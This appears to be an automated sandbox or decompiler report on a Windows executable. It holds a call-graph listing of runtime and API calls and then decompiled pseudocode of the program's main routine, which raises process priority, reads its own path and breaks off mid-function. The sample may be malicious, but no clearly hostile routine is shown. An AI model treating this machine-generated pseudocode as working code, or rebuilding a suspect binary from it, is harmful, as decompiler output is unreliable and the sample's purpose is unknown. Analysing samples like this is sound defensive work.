swprintf 31894->32123 31895->31823 31898->31428 31899->31471 31900->31472 31901->31511 31903 420cdd 31902->31903 31908 420c6e 31902->31908 32303 42793d DecodePointer 31903->32303 31905 420c79 31905->31908 32295 427f51 58 API calls 2 library calls 31905->32295 32296 427fae 58 API calls 7 library calls 31905->32296 32297 427b0b 31905->32297 31906 420ce3 32304 425208 58 API calls __getptd_noexit 31906->32304 31908->31905 31910 420ca1 RtlAllocateHeap 31908->31910 31913 420cc9 31908->31913 31917 420cc7 31908->31917 32300 42793d DecodePointer 31908->32300 31910->31908 31911 420cd5 31910->31911 31911->31499 32301 425208 58 API calls __getptd_noexit 31913->32301 32302 425208 58 API calls __getptd_noexit 31917->32302 31919->31512 31921 415c66 31920->31921 31927 415c1e 31920->31927 31922 415c76 31921->31922 31923 415cff 31921->31923 31925 415c88 __expandlocale 31922->31925 32309 416950 59 API calls 2 library calls 31922->32309 32310 44f23e 59 API calls 2 library calls 31923->32310 31925->31517 31927->31921 31931 415c45 31927->31931 31933 414690 59 API calls 31931->31933 31934 415c60 31933->31934 31934->31517 31935->31519 31936->31521 31937->31527 31938->31537 31940 413a90 59 API calls 31939->31940 31941 41294c MultiByteToWideChar 31940->31941 31942 418400 59 API calls 31941->31942 31943 41298d 31942->31943 31943->31540 31944->31545 31945->31553 31946->31559 31947->31563 31948->31567 31949->31571 31950->31575 31951->31579 31952->31583 31953->31585 31954->31587 31955->31589 31956->31591 31957->31593 31958->31595 31959->31597 31960->31599 31961->31601 31962->31603 31963->31605 31964->31607 31965->31609 31966->31611 31967->31613 31968->31615 31970 412c5f 31969->31970 31973 412c71 31969->31973 31971 4156d0 59 API calls 31970->31971 31972 412c6a 31971->31972 31972->31620 31974 4156d0 59 API calls 31973->31974 31975 412c8a 31974->31975 31975->31620 31976->31622 31977->31645 31978->31645 31979->31645 31980->31626 31981->31628 31982->31630 31983->31634 31984->31637 31985->31640 31986->31642 31987->31647 31988->31649 31989->31673 31990->31673 31991->31673 31992->31673 31993->31673 31994->31673 31995->31653 31999 415735 31998->31999 32005 4156de 31998->32005 32000 4157bc 31999->32000 32001 41573e 31999->32001 32022 44f23e 59 API calls 2 library calls 32000->32022 32002 415750 __expandlocale 32001->32002 32021 416760 59 API calls 2 library calls 32001->32021 32002->31682 32005->31999 32009 415704 32005->32009 32011 415709 32009->32011 32012 41571f 32009->32012 32019 413ff0 59 API calls __expandlocale 32011->32019 32020 413ff0 59 API calls __expandlocale 32012->32020 32015 415719 32015->31682 32016 41572f 32016->31682 32017->31686 32018->31681 32019->32015 32020->32016 32021->32002 32029 423b4c 32023->32029 32025 41ccca 32027 41a00a 32025->32027 32039 44f1bb 59 API calls 3 library calls 32025->32039 32027->31430 32027->31431 32031 423b54 32029->32031 32030 420c62 _malloc 58 API calls 32030->32031 32031->32030 32032 423b6e 32031->32032 32034 423b72 std::exception::exception 32031->32034 32040 42793d DecodePointer 32031->32040 32032->32025 32041 430eca RaiseException 32034->32041 32036 423b9c 32042 430d91 58 API calls _free 32036->32042 32038 423bae 32038->32025 32040->32031 32041->32036 32042->32038 32044 423b4c 59 API calls 32043->32044 32045 41cc5d 32044->32045 32046 41cc64 32045->32046 32050 44f1bb 59 API calls 3 library calls 32045->32050 32046->31694 32049 41d740 59 API calls 32046->32049 32049->31694 32053->31711 32054->31711 32058 431570 32055->32058 32059 431580 32058->32059 32060 431586 32059->32060 32065 4315ae 32059->32065 32069 425208 58 API calls __getptd_noexit 32060->32069 32062 43158b 32070 4242d2 9 API calls wcstoxq 32062->32070 32067 4315cf wcstoxq 32065->32067 32071 42e883 GetStringTypeW 32065->32071 32068 41a36e lstrcpyW lstrcpyW 32067->32068 32072 425208 58 API calls __getptd_noexit 32067->32072 32068->31464 32069->32062 32070->32068 32071->32065 32072->32068 32074 411cf2 RegOpenKeyExW 32073->32074 32074->31718 32074->31742 32075->31727 32076->31745 32078 420241 32077->32078 32079 4202b6 32077->32079 32086 420266 32078->32086 32087 425208 58 API calls __getptd_noexit 32078->32087 32089 4202c8 60 API calls 3 library calls 32079->32089 32082 4202c3 32082->31765 32083 42024d 32088 4242d2 9 API calls wcstoxq 32083->32088 32085 420258 32085->31765 32086->31765 32087->32083 32088->32085 32089->32082 32090->31792 32091->31791 32092->31788 32095->31811 32096->31812 32097->31799 32098->31801 32101 423b4c 59 API calls 32100->32101 32102 40b164 32101->32102 32103 40b177 SysAllocString 32102->32103 32104 40b194 32102->32104 32103->32104 32104->31828 32106 40b1de 32105->32106 32108 40b202 32105->32108 32107 40b1f5 SysFreeString 32106->32107 32106->32108 32107->32108 32108->31830 32110 423add __aulldiv 32109->32110 32110->31867 32124 43035d 32111->32124 32113 40d78f 32116 4228e0 32113->32116 32114 42355a 32114->32113 32132 423576 32114->32132 32250 42279f 32116->32250 32120 40b423 32119->32120 32121 40b41d 32119->32121 32122 40b42d VariantClear 32120->32122 32121->31889 32122->31889 32123->31841 32165 42501f 58 API calls 4 library calls 32124->32165 32126 430363 32127 430369 32126->32127 32129 43038d 32126->32129 32167 428cde 32126->32167 32127->32129 32166 425208 58 API calls __getptd_noexit 32127->32166 32129->32114 32131 43036e 32131->32114 32133 423591 32132->32133 32134 4235a9 _memset 32132->32134 32182 425208 58 API calls __getptd_noexit 32133->32182 32134->32133 32140 4235c0 32134->32140 32136 423596 32183 4242d2 9 API calls wcstoxq 32136->32183 32138 4235cb 32184 425208 58 API calls __getptd_noexit 32138->32184 32139 4235e9 32174 42fb64 32139->32174 32140->32138 32140->32139 32143 4235ee 32185 42f803 58 API calls wcstoxq 32143->32185 32145 4235f7 32146 4237e5 32145->32146 32186 42f82d 58 API calls wcstoxq 32145->32186 32199 4242fd 8 API calls 2 library calls 32146->32199 32149 4237ef 32150 423609 32150->32146 32187 42f857 32150->32187 32152 42361b 32152->32146 32153 423624 32152->32153 32154 42369b 32153->32154 32156 423637 32153->32156 32197 42f939 58 API calls 3 library calls 32154->32197 32194 42f939 58 API calls 3 library calls 32156->32194 32158 4236a2 32164 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 32158->32164 32198 42fbb4 58 API calls 3 library calls 32158->32198 32159 42364f 32159->32164 32195 42fbb4 58 API calls 3 library calls 32159->32195 32162 423668 32162->32164 32196 42f939 58 API calls 3 library calls 32162->32196 32164->32113 32165->32126 32166->32131 32169 428cec 32167->32169 32168 420c62 _malloc 58 API calls 32168->32169 32169->32168 32170 428d1e 32169->32170 32172 428cff 32169->32172 32170->32127 32172->32169 32172->32170 32173 4329c9 Sleep 32172->32173 32173->32172 32175 42fb70 __fsopen 32174->32175 32176 42fba5 __fsopen 32175->32176 32200 428af7 32175->32200 32176->32143 32178 42fb80 32181 42fb93 32178->32181 32207 42fe47 32178->32207 32236 42fbab LeaveCriticalSection _doexit 32181->32236 32182->32136 32183->32164 32184->32164 32185->32145 32186->32150 32188 42f861 32187->32188 32189 42f876 32187->32189 32248 425208 58 API calls __getptd_noexit 32188->32248 32189->32152 32191 42f866 32249 4242d2 9 API calls wcstoxq 32191->32249 32193 42f871 32193->32152 32194->32159 32195->32162 32196->32164 32197->32158 32198->32164 32199->32149 32201 428b1b EnterCriticalSection 32200->32201 32202 428b08 32200->32202 32201->32178 32237 428b9f 58 API calls 10 library calls 32202->32237 32204 428b0e 32204->32201 32238 427c2e 58 API calls 4 library calls 32204->32238 32206 428b1a 32206->32201 32208 42fe53 __fsopen 32207->32208 32209 428af7 __lock 58 API calls 32208->32209 32210 42fe71 __tzset_nolock 32209->32210 32211 42f857 __tzset_nolock 58 API calls 32210->32211 32212 42fe86 32211->32212 32227 42ff25 __tzset_nolock __isindst_nolock 32212->32227 32239 42f803 58 API calls wcstoxq 32212->32239 32215 42fe98 32215->32227 32240 42f82d 58 API calls wcstoxq 32215->32240 32216 42ff71 GetTimeZoneInformation 32216->32227 32219 42feaa 32219->32227 32241 433f99 58 API calls 2 library calls 32219->32241 32220 42ffd8 WideCharToMultiByte 32220->32227 32222 42feb8 32242 441667 78 API calls 3 library calls 32222->32242 32223 430010 WideCharToMultiByte 32223->32227 32226 42fed9 __tzset_nolock 32226->32227 32230 42ff0c _strlen 32226->32230 32243 420bed 58 API calls 2 library calls 32226->32243 32227->32216 32227->32220 32227->32223 32228 430157 __tzset_nolock __fsopen __isindst_nolock 32227->32228 32229 43ff8e 58 API calls __tzset_nolock 32227->32229 32235 423c2d 61 API calls __tzset_nolock 32227->32235 32245 4242fd 8 API calls 2 library calls 32227->32245 32246 420bed 58 API calls 2 library calls 32227->32246 32247 4300d7 LeaveCriticalSection _doexit 32227->32247 32228->32181 32229->32227 32231 428cde __malloc_crt 58 API calls 32230->32231 32233 42ff1a _strlen 32231->32233 32233->32227 32244 42c0fd 58 API calls wcstoxq 32233->32244 32235->32227 32236->32176 32237->32204 32238->32206 32239->32215 32240->32219 32241->32222 32242->32226 32243->32230 32244->32227 32245->32227 32246->32227 32247->32227 32248->32191 32249->32193 32277 42019c 32250->32277 32253 4227d4 32285 425208 58 API calls __getptd_noexit 32253->32285 32255 4227d9 32286 4242d2 9 API calls wcstoxq 32255->32286 32256 4227e9 MultiByteToWideChar 32258 422804 GetLastError 32256->32258 32259 422815 32256->32259 32287 4251e7 58 API calls 3 library calls 32258->32287 32260 428cde __malloc_crt 58 API calls 32259->32260 32264 42281d 32260->32264 32261 40d7a3 32261->31872 32263 422810 32290 420bed 58 API calls 2 library calls 32263->32290 32264->32263 32265 422825 MultiByteToWideChar 32264->32265 32265->32258 32267 42283f 32265->32267 32269 428cde __malloc_crt 58 API calls 32267->32269 32268 4228a0 32291 420bed 58 API calls 2 library calls 32268->32291 32271 42284a 32269->32271 32271->32263 32288 42d51e 88 API calls 3 library calls 32271->32288 32273 422866 32273->32263 32274 42286f WideCharToMultiByte 32273->32274 32274->32263 32275 42288b GetLastError 32274->32275 32289 4251e7 58 API calls 3 library calls 32275->32289 32278 4201ad 32277->32278 32283 4201fa 32277->32283 32292 425007 58 API calls 2 library calls 32278->32292 32280 4201b3 32282 4201da 32280->32282 32293 4245dc 58 API calls 6 library calls 32280->32293 32282->32283 32294 42495e 58 API calls 6 library calls 32282->32294 32283->32253 32283->32256 32285->32255 32286->32261 32287->32263 32288->32273 32289->32263 32290->32268 32291->32261 32292->32280 32293->32282 32294->32283 32295->31905 32296->31905 32305 427ad7 GetModuleHandleExW 32297->32305 32300->31908 32301->31917 32302->31911 32303->31906 32304->31911 32306 427af0 GetProcAddress 32305->32306 32307 427b07 ExitProcess 32305->32307 32306->32307 32308 427b02 32306->32308 32308->32307 32309->31925 32311 4285c0 32312 4285f7 32311->32312 32313 4285ea 32311->32313 32346 42a77e 32312->32346 32314 42a77e __87except 6 API calls 32313->32314 32314->32312 32316 42871f 32317 4286d4 __except_handler4 32317->32316 32319 42870f 32317->32319 32320 42a77e __87except 6 API calls 32317->32320 32318 428607 __except_handler4 32318->32316 32318->32317 32323 42865e __IsNonwritableInCurrentImage 32318->32323 32321 42a77e __87except 6 API calls 32319->32321 32320->32319 32321->32316 32353 4292e2 RtlUnwind 32323->32353 32324 428736 32326 42a77e __87except 6 API calls 32324->32326 32325 42869c __except_handler4 32325->32324 32327 42a77e __87except 6 API calls 32325->32327 32328 428746 __except_handler4 __fsopen 32326->32328 32327->32324 32329 428af7 __lock 58 API calls 32328->32329 32330 428767 32329->32330 32354 428c96 32330->32354 32333 4287e3 GetStartupInfoW 32340 4287f8 32333->32340 32343 428927 32333->32343 32334 428783 __fsopen @_EH4_CallFilterFunc@8 32335 4289ef 32362 4289ff LeaveCriticalSection _doexit 32335->32362 32337 428c96 __calloc_crt 58 API calls 32337->32340 32338 428974 GetStdHandle 32338->32343 32339 428987 GetFileType 32339->32343 32340->32337 32342 428846 32340->32342 32340->32343 32341 42887a GetFileType 32341->32342 32342->32341 32342->32343 32360 43263e InitializeCriticalSectionAndSpinCount 32342->32360 32343->32335 32343->32338 32343->32339 32361 43263e InitializeCriticalSectionAndSpinCount 32343->32361 32347 42a786 32346->32347 32348 42a788 IsProcessorFeaturePresent 32346->32348 32347->32318 32350 42ab9c 32348->32350 32363 42ab4b 5 API calls ___raise_securityfailure 32350->32363 32352 42ac7f 32352->32318 32353->32325 32356 428c9d 32354->32356 32357 428778 32356->32357 32359 428cbb 32356->32359 32364 43b813 32356->32364 32357->32333 32357->32334 32359->32356 32359->32357 32372 4329c9 Sleep 32359->32372 32360->32342 32361->32343 32362->32334 32363->32352 32365 43b81e 32364->32365 32367 43b839 32364->32367 32366 43b82a 32365->32366 32365->32367 32373 425208 58 API calls __getptd_noexit 32366->32373 32369 43b849 RtlAllocateHeap 32367->32369 32370 43b82f 32367->32370 32374 42793d DecodePointer 32367->32374 32369->32367 32369->32370 32370->32356 32372->32359 32373->32370 32374->32367 32375 43235f GetEnvironmentStringsW 32376 432370 32375->32376 32377 4323b7 32375->32377 32378 428cde __malloc_crt 58 API calls 32376->32378 32379 432396 __expandlocale 32378->32379 32380 4323ac FreeEnvironmentStringsW 32379->32380 32380->32377 32381 427f3d 32384 427e0e 32381->32384 32383 427f4c 32385 427e1a __fsopen 32384->32385 32386 428af7 __lock 51 API calls 32385->32386 32387 427e21 32386->32387 32388 427eda __initterm 32387->32388 32389 427e4f RtlDecodePointer 32387->32389 32404 427f28 32388->32404 32389->32388 32391 427e66 DecodePointer 32389->32391 32397 427e76 32391->32397 32393 427f37 __fsopen 32393->32383 32395 427e83 EncodePointer 32395->32397 32396 427f1f 32398 427b0b _doexit 3 API calls 32396->32398 32397->32388 32397->32395 32399 427e93 DecodePointer EncodePointer 32397->32399 32400 427f28 32398->32400 32402 427ea5 DecodePointer DecodePointer 32399->32402 32401 427f35 32400->32401 32409 428c81 LeaveCriticalSection 32400->32409 32401->32383 32402->32397 32405 427f08 32404->32405 32406 427f2e 32404->32406 32405->32393 32408 428c81 LeaveCriticalSection 32405->32408 32410 428c81 LeaveCriticalSection 32406->32410 32408->32396 32409->32401 32410->32405
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
                                                                                                    				intOrPtr _v0;
                                                                                                    				int _v4;
                                                                                                    				long _v8;
                                                                                                    				WCHAR** _v12;
                                                                                                    				short* _v16;
                                                                                                    				int _v20;
                                                                                                    				CHAR* _v24;
                                                                                                    				int _v28;
                                                                                                    				int _v32;
                                                                                                    				int _v36;
                                                                                                    				int _v40;
                                                                                                    				int _v44;
                                                                                                    				int _v48;
                                                                                                    				int _v52;
                                                                                                    				int _v56;
                                                                                                    				char _v60;
                                                                                                    				char _v64;
                                                                                                    				char _v68;
                                                                                                    				char _v72;
                                                                                                    				char _v76;
                                                                                                    				char _v80;
                                                                                                    				char _v84;
                                                                                                    				char _v88;
                                                                                                    				char _v92;
                                                                                                    				char _v96;
                                                                                                    				char _v100;
                                                                                                    				char _v104;
                                                                                                    				char _v108;
                                                                                                    				char _v112;
                                                                                                    				char _v116;
                                                                                                    				char _v120;
                                                                                                    				char _v124;
                                                                                                    				char _v128;
                                                                                                    				char _v132;
                                                                                                    				void* __esi;
                                                                                                    				void* _t525;
                                                                                                    				void* _t526;
                                                                                                    				void* _t528;
                                                                                                    				int _t530;
                                                                                                    				void* _t534;
                                                                                                    				void* _t535;
                                                                                                    				void* _t536;
                                                                                                    				void* _t556;
                                                                                                    				int _t557;
                                                                                                    				WCHAR** _t566;
                                                                                                    				void* _t570;
                                                                                                    				void* _t573;
                                                                                                    				int _t581;
                                                                                                    				void* _t585;
                                                                                                    				void* _t588;
                                                                                                    				intOrPtr* _t590;
                                                                                                    				int _t592;
                                                                                                    				void* _t594;
                                                                                                    				CHAR* _t596;
                                                                                                    				void* _t599;
                                                                                                    				void* _t602;
                                                                                                    				void* _t608;
                                                                                                    				void* _t614;
                                                                                                    				int* _t618;
                                                                                                    				short* _t677;
                                                                                                    				void* _t697;
                                                                                                    				void* _t707;
                                                                                                    				void* _t723;
                                                                                                    				void* _t727;
                                                                                                    				long _t728;
                                                                                                    				long _t729;
                                                                                                    				void* _t730;
                                                                                                    				void* _t746;
                                                                                                    				long _t747;
                                                                                                    				void* _t751;
                                                                                                    				void* _t754;
                                                                                                    				long _t755;
                                                                                                    				void* _t759;
                                                                                                    				void* _t765;
                                                                                                    				signed int _t770;
                                                                                                    				void* _t773;
                                                                                                    				void* _t780;
                                                                                                    				void* _t782;
                                                                                                    				void* _t784;
                                                                                                    				void* _t788;
                                                                                                    				signed int _t789;
                                                                                                    				void* _t790;
                                                                                                    				void* _t799;
                                                                                                    				void* _t800;
                                                                                                    				void* _t817;
                                                                                                    				void* _t828;
                                                                                                    				void* _t839;
                                                                                                    				short* _t846;
                                                                                                    				void* _t856;
                                                                                                    				void* _t859;
                                                                                                    				char* _t861;
                                                                                                    				void* _t865;
                                                                                                    				long _t868;
                                                                                                    				intOrPtr* _t879;
                                                                                                    				void* _t881;
                                                                                                    				void* _t895;
                                                                                                    				void* _t896;
                                                                                                    				void* _t897;
                                                                                                    				void* _t898;
                                                                                                    				void* _t899;
                                                                                                    				void* _t901;
                                                                                                    				void* _t903;
                                                                                                    				long _t916;
                                                                                                    				signed int _t917;
                                                                                                    				void* _t919;
                                                                                                    				WCHAR** _t923;
                                                                                                    				WCHAR** _t949;
                                                                                                    				WCHAR* _t950;
                                                                                                    				void* _t952;
                                                                                                    				int* _t955;
                                                                                                    				int* _t958;
                                                                                                    				int* _t960;
                                                                                                    				intOrPtr _t962;
                                                                                                    				int _t966;
                                                                                                    				WCHAR** _t968;
                                                                                                    				void* _t969;
                                                                                                    				void* _t974;
                                                                                                    				intOrPtr* _t982;
                                                                                                    				void* _t983;
                                                                                                    				intOrPtr* _t986;
                                                                                                    				void* _t987;
                                                                                                    				WCHAR* _t989;
                                                                                                    				signed int _t990;
                                                                                                    				signed int _t991;
                                                                                                    				WCHAR* _t995;
                                                                                                    				signed int _t996;
                                                                                                    				signed int _t997;
                                                                                                    				WCHAR* _t1000;
                                                                                                    				signed int _t1001;
                                                                                                    				signed int _t1002;
                                                                                                    				intOrPtr* _t1005;
                                                                                                    				void* _t1006;
                                                                                                    				char* _t1008;
                                                                                                    				intOrPtr* _t1011;
                                                                                                    				void* _t1012;
                                                                                                    				char* _t1014;
                                                                                                    				intOrPtr* _t1017;
                                                                                                    				void* _t1018;
                                                                                                    				char* _t1020;
                                                                                                    				intOrPtr* _t1136;
                                                                                                    				void* _t1137;
                                                                                                    				short* _t1142;
                                                                                                    				void* _t1145;
                                                                                                    				intOrPtr _t1159;
                                                                                                    				intOrPtr _t1161;
                                                                                                    				intOrPtr* _t1164;
                                                                                                    				intOrPtr* _t1167;
                                                                                                    				short* _t1168;
                                                                                                    				short* _t1171;
                                                                                                    				short* _t1173;
                                                                                                    				intOrPtr* _t1175;
                                                                                                    				intOrPtr* _t1178;
                                                                                                    				intOrPtr* _t1181;
                                                                                                    				intOrPtr* _t1191;
                                                                                                    				int _t1197;
                                                                                                    				int _t1198;
                                                                                                    				WCHAR* _t1199;
                                                                                                    				short* _t1200;
                                                                                                    				signed int _t1201;
                                                                                                    				signed int _t1202;
                                                                                                    				signed int _t1204;
                                                                                                    				short* _t1205;
                                                                                                    				signed int _t1206;
                                                                                                    				int* _t1207;
                                                                                                    				signed int _t1208;
                                                                                                    				int* _t1209;
                                                                                                    				signed int _t1210;
                                                                                                    				int* _t1211;
                                                                                                    				intOrPtr* _t1212;
                                                                                                    				unsigned int _t1215;
                                                                                                    				signed int _t1217;
                                                                                                    				void* _t1220;
                                                                                                    				int* _t1226;
                                                                                                    				void* _t1227;
                                                                                                    				int _t1230;
                                                                                                    				short* _t1231;
                                                                                                    				int _t1232;
                                                                                                    				int _t1233;
                                                                                                    				int _t1234;
                                                                                                    				int _t1235;
                                                                                                    				char _t1236;
                                                                                                    				int _t1242;
                                                                                                    				signed int _t1244;
                                                                                                    				short* _t1245;
                                                                                                    				long _t1248;
                                                                                                    				void* _t1249;
                                                                                                    				signed int _t1263;
                                                                                                    				signed int _t1264;
                                                                                                    				void* _t1266;
                                                                                                    				void* _t1268;
                                                                                                    				void* _t1269;
                                                                                                    				short* _t1270;
                                                                                                    				void* _t1271;
                                                                                                    				short* _t1272;
                                                                                                    				void* _t1273;
                                                                                                    				void* _t1274;
                                                                                                    				char* _t1275;
                                                                                                    				void* _t1276;
                                                                                                    				void* _t1277;
                                                                                                    				char* _t1278;
                                                                                                    				void* _t1279;
                                                                                                    				void* _t1280;
                                                                                                    				char* _t1281;
                                                                                                    				void* _t1282;
                                                                                                    				void* _t1283;
                                                                                                    				void* _t1284;
                                                                                                    				void* _t1285;
                                                                                                    				void* _t1286;
                                                                                                    				void* _t1290;
                                                                                                    				void* _t1292;
                                                                                                    				short* _t1294;
                                                                                                    
                                                                                                    				_t1264 = _t1263 & 0xfffffff8;
                                                                                                    				E0042F7C0(0x14c4);
                                                                                                    				_push(__ebx);
                                                                                                    				_push(__edi);
                                                                                                    				 *0x513244 = _a4; // executed
                                                                                                    				_t525 = E0040CF10(); // executed
                                                                                                    				if(_t525 == 0) {
                                                                                                    					_t526 = GetCurrentProcess();
                                                                                                    					GetLastError();
                                                                                                    					_t528 = SetPriorityClass(_t526, 0x80); // executed
                                                                                                    					__eflags = _t528;
                                                                                                    					if(__eflags == 0) {
                                                                                                    						GetLastError();
                                                                                                    					}
                                                                                                    					_t1226 =  *0x529228; // 0x54d9b0
                                                                                                    					_a52 = 0;
                                                                                                    					_a56 = 0;
                                                                                                    					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
                                                                                                    					_t1159 =  *0x52922c; // 0x0
                                                                                                    					_t974 = 0xffffffe - _t1159;
                                                                                                    					_t1197 = _t530;
                                                                                                    					__eflags = _t974 - 1;
                                                                                                    					if(__eflags < 0) {
                                                                                                    						_push("list<T> too long");
                                                                                                    						E0044F23E(__eflags);
                                                                                                    						goto L213;
                                                                                                    					} else {
                                                                                                    						 *0x52922c = _t1159 + 1;
                                                                                                    						_t1226[1] = _t1197;
                                                                                                    						 *( *(_t1197 + 4)) = _t1197;
                                                                                                    						_t556 = E00419D10( &_a984);
                                                                                                    						_t1226 =  *0x513268;
                                                                                                    						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
                                                                                                    						_t1161 =  *0x51326c;
                                                                                                    						_t974 = 0x1cb189 - _t1161;
                                                                                                    						_t1198 = _t557;
                                                                                                    						__eflags = _t974 - 1;
                                                                                                    						if(__eflags < 0) {
                                                                                                    							L213:
                                                                                                    							_push("list<T> too long");
                                                                                                    							E0044F23E(__eflags);
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							_push(_t1226);
                                                                                                    							_t1227 = _t974;
                                                                                                    							__eflags =  *(_t1227 + 0x8dc) - 0x10;
                                                                                                    							if( *(_t1227 + 0x8dc) >= 0x10) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x8dc) = 0xf;
                                                                                                    							 *(_t1227 + 0x8d8) = 0;
                                                                                                    							 *((char*)(_t1227 + 0x8c8)) = 0;
                                                                                                    							__eflags =  *(_t1227 + 0x8b8) - 8;
                                                                                                    							if( *(_t1227 + 0x8b8) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x8b8) = 7;
                                                                                                    							 *(_t1227 + 0x8b4) = 0;
                                                                                                    							 *((short*)(_t1227 + 0x8a4)) = 0;
                                                                                                    							_t534 =  *(_t1227 + 0x898);
                                                                                                    							__eflags = _t534;
                                                                                                    							if(_t534 != 0) {
                                                                                                    								E00414F10(_t534,  *(_t1227 + 0x89c));
                                                                                                    								L00422587( *(_t1227 + 0x898));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    								 *(_t1227 + 0x898) = 0;
                                                                                                    								 *(_t1227 + 0x89c) = 0;
                                                                                                    								 *(_t1227 + 0x8a0) = 0;
                                                                                                    							}
                                                                                                    							_t535 =  *(_t1227 + 0x88c);
                                                                                                    							__eflags = _t535;
                                                                                                    							if(_t535 != 0) {
                                                                                                    								E00414F10(_t535,  *(_t1227 + 0x890));
                                                                                                    								L00422587( *(_t1227 + 0x88c));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    								 *(_t1227 + 0x88c) = 0;
                                                                                                    								 *(_t1227 + 0x890) = 0;
                                                                                                    								 *(_t1227 + 0x894) = 0;
                                                                                                    							}
                                                                                                    							_t536 =  *(_t1227 + 0x880);
                                                                                                    							__eflags = _t536;
                                                                                                    							if(_t536 != 0) {
                                                                                                    								E00414F10(_t536,  *(_t1227 + 0x884));
                                                                                                    								L00422587( *(_t1227 + 0x880));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    								 *(_t1227 + 0x880) = 0;
                                                                                                    								 *(_t1227 + 0x884) = 0;
                                                                                                    								 *(_t1227 + 0x888) = 0;
                                                                                                    							}
                                                                                                    							__eflags =  *(_t1227 + 0x87c) - 8;
                                                                                                    							if( *(_t1227 + 0x87c) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x87c) = 7;
                                                                                                    							 *(_t1227 + 0x878) = 0;
                                                                                                    							 *((short*)(_t1227 + 0x868)) = 0;
                                                                                                    							__eflags =  *(_t1227 + 0x864) - 8;
                                                                                                    							if( *(_t1227 + 0x864) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x864) = 7;
                                                                                                    							 *(_t1227 + 0x860) = 0;
                                                                                                    							 *((short*)(_t1227 + 0x850)) = 0;
                                                                                                    							__eflags =  *(_t1227 + 0x84c) - 8;
                                                                                                    							if( *(_t1227 + 0x84c) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x84c) = 7;
                                                                                                    							 *(_t1227 + 0x848) = 0;
                                                                                                    							 *((short*)(_t1227 + 0x838)) = 0;
                                                                                                    							__eflags =  *(_t1227 + 0x834) - 8;
                                                                                                    							if( *(_t1227 + 0x834) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x834) = 7;
                                                                                                    							 *(_t1227 + 0x830) = 0;
                                                                                                    							 *((short*)(_t1227 + 0x820)) = 0;
                                                                                                    							__eflags =  *(_t1227 + 0x1c) - 8;
                                                                                                    							if( *(_t1227 + 0x1c) >= 8) {
                                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 8)));
                                                                                                    							}
                                                                                                    							 *(_t1227 + 0x1c) = 7;
                                                                                                    							__eflags = 0;
                                                                                                    							 *(_t1227 + 0x18) = 0;
                                                                                                    							 *((short*)(_t1227 + 8)) = 0;
                                                                                                    							return 0;
                                                                                                    						} else {
                                                                                                    							 *0x51326c = _t1161 + 1;
                                                                                                    							_t1226[1] = _t1198;
                                                                                                    							 *( *(_t1198 + 4)) = _t1198;
                                                                                                    							L214();
                                                                                                    							_a32 = 0;
                                                                                                    							_a44 = 0;
                                                                                                    							_t1230 =  *( *0x513268);
                                                                                                    							_v4 = _t1230;
                                                                                                    							_a52 = _t1230;
                                                                                                    							E00413A90(0,  &_a128, _t1198, 0x400);
                                                                                                    							_t1199 = _a124;
                                                                                                    							GetModuleFileNameW(0, _t1199, 0x400);
                                                                                                    							PathRemoveFileSpecW(_t1199);
                                                                                                    							_push(_a72);
                                                                                                    							_a180 = 7;
                                                                                                    							_a176 = 0;
                                                                                                    							_a160 = 0;
                                                                                                    							E00418400( &_a160, _t1199, _a128);
                                                                                                    							_t1200 = _t1230 + 0x10;
                                                                                                    							__eflags = _t1200 -  &_a148;
                                                                                                    							if(_t1200 !=  &_a148) {
                                                                                                    								__eflags =  *(_t1200 + 0x14) - 8;
                                                                                                    								if( *(_t1200 + 0x14) >= 8) {
                                                                                                    									L00422587( *_t1200);
                                                                                                    									_t1264 = _t1264 + 4;
                                                                                                    								}
                                                                                                    								__eflags = 0;
                                                                                                    								 *(_t1200 + 0x14) = 7;
                                                                                                    								 *(_t1200 + 0x10) = 0;
                                                                                                    								 *_t1200 = 0;
                                                                                                    								E004145A0(_t1200,  &_a160);
                                                                                                    							}
                                                                                                    							__eflags = _a180 - 8;
                                                                                                    							if(_a180 >= 8) {
                                                                                                    								L00422587(_a160);
